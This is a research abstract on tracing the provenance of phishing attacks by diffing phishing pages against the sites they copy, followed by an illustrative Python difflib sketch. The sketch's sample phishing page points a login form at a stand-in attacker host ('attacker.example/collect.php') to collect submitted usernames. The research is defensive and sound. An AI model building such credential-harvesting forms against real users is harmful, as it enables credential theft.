Phishing webpages are a previously underused source of information for determining the provenance of phishing attacks. A phishing webpage impersonates a legitimate website in order to trick potential victims into revealing confidential data, such as usernames and passwords. However, different phishing webpages often contain small differences, and these differences can provide a great deal of evidence about the provenance of an attack. When a webpage is impersonated, much of the original website is reproduced in the phishing website. This leaves a large amount of 'redundant' information and makes phishing websites from different attacks very similar to one another. To overcome this issue, a diff can be used which takes the phishing and original websites as input and returns the differences between the two. These differences present a previously unused view of the data and offer a novel way to improve the ability of clustering algorithms to find good, distinct and well-separated clusters. The research presented here outlines this diff process and shows that, for the data used, comparable results were obtained while the dimensionality of the dataset was reduced. This reduction allows clustering algorithms to complete faster.
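The diff step described above can be illustrated with a minimal sketch. It is not the authors' implementation: the function name `page_diff`, the line-based comparison, and the choice to keep only the lines that are new or changed on the phishing side are all assumptions made for illustration, using Python's standard `difflib` module.

```python
import difflib


def page_diff(original_html: str, phishing_html: str) -> list[str]:
    """Return lines of the phishing page that differ from the original page.

    Hypothetical helper: a line-level comparison that assumes the phishing
    page is a lightly edited copy of the original.
    """
    # Strip surrounding whitespace so indentation changes are not reported.
    original_lines = [line.strip() for line in original_html.splitlines()]
    phishing_lines = [line.strip() for line in phishing_html.splitlines()]

    matcher = difflib.SequenceMatcher(
        a=original_lines, b=phishing_lines, autojunk=False
    )

    differing = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        # Keep only content inserted or replaced on the phishing side;
        # lines shared with the original are the 'redundant' part.
        if tag in ("replace", "insert"):
            differing.extend(phishing_lines[j1:j2])
    return differing


# Made-up example pages; the domains are placeholders.
original = """<html>
<form action="https://bank.example/login">
<input name="user">
</form>
</html>"""

phishing = """<html>
<form action="http://attacker.example/collect.php">
<input name="user">
</form>
</html>"""

print(page_diff(original, phishing))
```

In this sketch only the altered form target survives the diff, so a later feature extraction step would see one line rather than the whole page. Lines that the attacker deleted from the original are ignored here; whether those should also count as features is a design choice the abstract does not settle.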